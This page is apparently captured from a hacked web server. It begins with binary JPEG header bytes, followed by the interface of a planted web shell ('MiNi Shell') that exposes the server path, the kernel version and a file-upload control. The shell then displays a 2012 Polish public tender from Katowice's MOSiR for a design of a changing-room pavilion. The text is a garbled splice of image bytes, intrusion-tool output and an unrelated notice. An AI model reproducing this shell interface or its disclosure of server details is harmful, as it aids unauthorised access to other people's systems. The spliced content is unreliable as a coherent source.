JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120817/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120817/303212-N-2012.html

<p class="kh_header"><b>Katowice: Wykonanie projektu koncepcyjnego pawilonu zaplecza szatniowo-technicznego</b><br>
<b>Numer ogłoszenia: 303212 - 2012; data zamieszczenia: 17.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji , Aleja Korfantego 35, 40-005 Katowice, woj. śląskie, tel. 32 258 53 55, 253 87 33, faks 32 253 87 33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.um.katowice.pl/jednostki/mosir/bip</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa miasta Katowice nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektu koncepcyjnego pawilonu zaplecza szatniowo-technicznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi (z uwzględnieniem postanowień art. 30 Ustawy) wykonanie projektu koncepcyjnego pawilonu zaplecza szatniowo-technicznego na terenie boiska piłkarskiego Rapid w Katowicach.
 
LOKALIZACJA, OPIS STANU ISTNIEJĄCEGO

Charakterystyka obiektu:

Boisko Sportowe RAPID położone jest przy ul. Grażyńskiego 51 w Katowicach, w dzielnicy Koszutka. 
Jest to obiekt całoroczny przeznaczony do celów rekreacyjno - sportowych. Obiekt nie jest przeznaczony do organizowania imprez masowych.

Opis obiektu: 
Boisko główne
jest usytuowane w środkowo- południowej części działki. Nawierzchnia z trawy syntetycznej pozwala na intensywne korzystanie z boiska oraz wykorzystanie go niezależnie od warunków pogodowych. Kolor nawierzchni ciemno zielony. Boisko jest wyposażone w drenaż PCV o średnicy 65 mm oraz odwodnienie liniowe ze wszystkich stron. Od strony wschodniej znajduje się pas nawierzchni utwardzonej o szerokości 3m. pokrytej nawierzchnią z trawy syntetycznej. W czterech narożnikach boiska znajdują się 4 maszty oświetleniowe. 
Wymiary boiska 110 m x 72 m
Konstrukcja nawierzchni:
trawa syntetyczna - gr. 65 mm (Prestiż System firmy Tarkett - Sports),
kruszywo łamane 0-4 mm - gr 5,0 cm
kruszywo łamane (kruszone) stabilizowane mech. 4-30 mm - gr. 20 cm
piasek zagęszczony - gr. 10 cm
drenaż w obsypce z kruszyw płukanych 8-26 mm
geowłóknina
grunt rodzimy
Powierzchnia płyty boiska -  7 920 m2 
Boisko treningowe z trawy syntetycznej 
Wymiary boiska - 51m x 34 m
Powierzchnia boiska -  1 734,0 m2 
Uzbrojenie płyty boiska - drenaż odwadniający PCV. 
Wyposażenie boiska
dwie bramki, słupki bramkowe i poprzeczne koloru białego, słupki osadzone w tulejach 
w fundamencie betonowym piłkochwyty wysokości 8,5 m z sieci polipropylenowej w kolorze zielonym zamocowanej na słupach stalowych z linką naciągową pomiędzy słupami, skrajne z zastrzałem. Słupy w fundamentach betonowych o wym. 40x 40x 150 m w rozstawie co ok. 5,0 m.

Komunikacja
Na terenie kompleksu sportowego znajduje się parking na 10 samochodów oraz przejazd o szerokości 3,0 m.
Konstrukcja nawierzchni:
kostka betonowa gr 8 cm
podsypka cementowo - piaskowa 3 cm
kruszywo łamane 0 -31,5 Rm = 2,5MPa 25 cm
grunt rodzimy

Oświetlenie
Maszt 8-kątny SMO 20, pełnościenny o wysokości 20 m, przeznaczony do zamontowania na jego szczycie głowicy oświetleniowej służącej do zamocowania 7 projektorów oświetleniowych. Masztów takich jest 4. Maszty oświetleniowe zostały doposażone w dodatkowe reflektory na wysokości 12 m w oprawie oświetleniowej typu MAXILUX 7-4202-1237+7-4203-1237+7-4204-1237 o parametrach kl I, 50Hz, IP65, po jednym na każdym z masztów.
Konstrukcja masztu
Maszt został zaprojektowany jako ostrosłup ścięty o podstawie ośmiokąta foremnego. Składa się z dwóch elementów nakładanych na siebie teleskopowo i łączonych ze sobą za pomocą zacisku o dł. ok. 1000 mm.
Średnica okręgu opisanego na wierzchołku masztu wynosi 110 mm, a przy podstawie 501 mm.
Wysokość całkowita masztu wynosi 20 m.
Górny segment wykonano z blachy o gr. 4 mm i długości 10500 mm, a dolny z blachy o grubości 5 mm i długości 10500 mm ze stali St3S. Składają się z dwóch części zaspawanych wzdłuż spoiną V wykonaną na pełny przetop. Maszt od góry zakończono kołnierzem o grubości 10 mm i średnicy 0220 mm służącym do zamocowania głowicy oświetleniowej, a od spodu zakończony blachą czołową o średnicy 0700 mm i grubości 25 mm ze stali 18G2. Maszt zamocowany jest do fundamentu za pomocą 8 śrub o średnicy 0 27 mm i długości 1200 mm . Fundament pod maszt o wymiarach 120 x 120 x 120 cm wykonano z betonu B20 zbrojony stalą zbrojeniową gładką klasy A-O (STOS).

Budynek socjalny
Charakterystyka poszczególnych elementów kontenera:
konstrukcja: umożliwia posadowienie kontenera w każdym terenie dzięki ustawieniu stóp fundamentowych pod budynkiem, stalowe profile zimnogięte tworzą samonośny szkielet, na który składa się sprawna konstrukcja podłogi i stropodachu oraz stalowe słupy usytuowane w narożach kontenera elementy pokrywane są farbami podkładowymi i antykorozyjnymi.
podłoga: wypełnienie standardowe od dołu: blacha trapezowa, wełna mineralna grubości l00mm płyta podłogowa OSB wodoodporna w pomieszczeniach mokrych wylewka cementowa zatarta na ostro na płytach OSB, wykładzina PCV - szatnie, płytki typu Gres w pomieszczeniach sanitarnych, magazynach w kabinach prysznicowych.
stropodach: wykonany z płyt ALAMENTTI
warstwowy pokryty od zewnątrz blachą trapezową, a od środka pokryty blachą ocynkowaną lakierowaną ocieplony wełną mineralną gr. 100 mm. Rury spustowe wykonane z pcv o przekroju fi 8, rynny z blachy ocynkowanej o wym. 6,5 x 10.

Budynek socjalno - biurowy zawiera:
szatnię z łazienką dla trenerów
4 szatnie z łazienkami dla zawodników
magazyn z pomieszczeniem gospodarczym
biuro z monitoringiem
pomieszczenie szatniowe z łazienkami dla pracowników obsługi obiektu
WC ogólnodostępne damskie i męskie
pomieszczenie kotłowni
Powierzchnia działki - 17 156,00m2 
Powierzchnia boiska głównego - 7 920,00m2 
Powierzchnia boiska treningowego - 1 734,00m2 
Powierzchnia zabudowy obiektu kontenerowego - 285,90m2 
Kubatura obiektu - 857,70m3
Gabarytowe wymiary budynku: długość: 35,08m, szerokość: 8,15m, wysokość: 3,00m

Przedmiot zamówienia obejmuje:

1 Wykonanie mapy dla celów projektowych
Należy wykonać mapę do celów projektowych w skali 1:500 dla obszaru objętego zamówieniem oraz wykaz właścicieli działek sporządzony na podstawie wypisów z ewidencji gruntów wraz z użytkami i klasą gruntów.
2 Wykonanie badań geotechnicznych
Należy wykonać badania geologiczne (w tym odwiertów geologicznych w ilości zapewniającej pełne rozeznanie uwarunkowań geologicznych dla prawidłowego fundamentowania obiektu, nie mniej niż 4).
3 Wykonanie projektu koncepcyjnego
Należy wykonać architektoniczną koncepcję programowo przestrzenną pawilonu szatniowo-technicznego (rzuty, elewacje, wizualizacja obiektu) w  2 egz. w wersji papierowej oraz w wersji elektronicznej, oraz wystąpić w imieniu Zamawiającego, o decyzję o ustaleniu lokalizacji inwestycji celu publicznego.

Pawilon szatniowo-techniczny powinien zawierać następujące pomieszczenia:
-szatnię z łazienką dla sędziów
- minimum sześć szatni z łazienkami dla zawodników
-magazyn i pomieszczenia gospodarcze
-pomieszczenia szatniowe z łazienkami dla pracowników obsługi
- biuro ze stanowiskiem monitoringu
-WC ogólnodostępne damskie i męskie
-pomieszczenie z przeznaczeniem na punkt gastronomiczny
-sale konferencyjną
- WC dla niepełnosprawnych (należy przewidzieć drogi i dojścia dla niepełnosprawnych).
Należy przyjąć budowę pawilonu o pow. ok. 850 m2
4.  Wykonanie kosztorysu inwestycyjnego w  2 egz. w wersji papierowej oraz w wersji elektronicznej.

Dokumentacja techniczna winna być opracowana zgodnie z obowiązującymi przepisami w tym w szczególności:
- Ustawa z dn. 7 lipca 1994r. Prawo budowlane (tekst jednolity Dz. U. z 2006r. Nr 156, poz. 1118 z późn. zm.)
- Rozporządzenie Ministra Infrastruktury z dn. 12 kwietnia 2002r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie ( Dz. U. z 2002r. Nr 75, poz. 690 z późn. zmianami)
- Rozporządzenie Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. poz. 462). 
- Rozporządzenie Ministra Infrastruktury z dn. 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno- użytkowego (Dz. U. z 2004r.nr 202, poz.2072 z późn. zmianami)

Wykonawca ma obowiązek zapewnienia sprawdzenia  dokumentacji pod względem zgodności z obowiązującymi przepisami w tym techniczno-budowlanymi przez osobę posiadającą uprawnienia budowlane w wymaganej specjalności budowlanej lub rzeczoznawcę budowlanego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie. Zamawiający dokona oceny spełnienia w/w warunku na podstawie złożonego wraz ofertą oświadczenia 
o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt. 18.2 SIWZ. Ocena spełniania warunków odbędzie się na podstawie złożonych oświadczeń i dokumentów na zasadzie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku jeśli Wykonawca wykaże, że zaprojektował samodzielnie lub wspólnie w rozumieniu art. 23 ustawy jedno zadanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia oraz poda: wartość i przedmiot usługi, daty wykonania i odbiorców, oraz załączy dokumenty potwierdzające,  że  usługi zostały wykonane należycie. 
	Przez jedną usługę projektową o której mowa wyżej rozumie się wykonanie projektu koncepcyjnego lub projektu budowlanego budynku użyteczności publicznej o powierzchni użytkowej  minimum 800m2
Ocena spełniania warunków odbędzie się na podstawie złożonych oświadczeń i dokumentów na zasadzie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie. Zamawiający dokona oceny spełnienia w/w warunku na podstawie złożonego wraz ofertą oświadczenia 
o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt. 18.2 SIWZ. 
Ocena spełniania warunków odbędzie się na podstawie złożonych oświadczeń i dokumentów na zasadzie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku jeśli Wykonawca wykaże, że dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia tj. wykaże osoby, które będą uczestniczyć w wykonywaniu zamówienia i przedstawi informację o podstawie do dysponowania tymi osobami, 
i tak: złoży pisemne oświadczenie, że osoby które będą wykonywać zamówienie posiadają niżej określone uprawnienia: 
	-  projektant - uprawnienia do projektowania bez ograniczeń w specjalności architektonicznej
lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz posiadają aktualne zaświadczenia o przynależności do właściwej Okręgowej Izby Samorządu Zawodowego w oparciu o art. 6 ust. 1 ustawy z dnia 15 grudnia 2000r. o samorządach zawodowych architektów inżynierów oraz urbanistów (Dz. U. z 2001r. nr 5 poz. 42 za zm.)
Ocena spełniania warunków odbędzie się na podstawie złożonych oświadczeń i dokumentów na zasadzie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie. Zamawiający dokona oceny spełnienia w/w warunku na podstawie złożonego wraz ofertą oświadczenia 
o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt. 18.2 SIWZ. 
Ocena spełniania warunków odbędzie się na podstawie złożonych oświadczeń i dokumentów na zasadzie spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Oferta na formularzu oferty, o treści zgodnej z określoną we wzorze stanowiącym  załącznik  do SIWZ.
2.	Oświadczenie Wykonawcy, o treści określonej w art. 22 ust. 1 - że Wykonawca może ubiegać się o udzielenie zamówienia, wg wzoru stanowiącego załącznik  do SIWZ.
3. W przypadku gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia (np. spółki cywilne, konsorcja) - wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Fakt ustanowienia pełnomocnika należy udokumentować dołączeniem pełnomocnictwa podpisanego przez wszystkich wykonawców wspólnie ubiegających się o zamówienie. Pełnomocnictwo winno być w formie oryginału lub notarialnie poświadczonej kopii. 
Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy.
Zamawiający przy ocenie spełnienia warunków będzie rozpatrywał podane informacje łącznie z zastrzeżeniem, że dokumenty wymienione w punkcie 18 ppkt 4 litery a-d  SIWZ muszą przedstawić dla każdego z partnerów Konsorcjum lub wspólników spółki osobno.
Dokumenty załączone do oferty winne być przedstawione w formie oryginałów lub kserokopii poświadczonych za zgodność z oryginałem przez osoby upoważnione do składania oświadczeń woli w imieniu wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość wprowadzenia zmian do zawartej umowy w przypadku: 
	-  konieczności zmiany osoby wskazanej jako projektant i przedstawiciel Zamawiającego,
	- zaistnienia nadzwyczajnej okoliczności której nie można było przewidzieć  w chwili zawarcia umowy wynikającej z potrzeby zmiany np. koncepcji realizacji inwestycji, a zmiana ta jest korzystna dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.katowice.pl/jednostki/mosir/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji, Al. Korfantego 35, 40-005 Katowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.08.2012 godzina 09:00, miejsce: Miejski Ośrodek Sportu i Rekreacji, Al. Korfantego 35, 40-005 Katowice, pokój nr 8 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com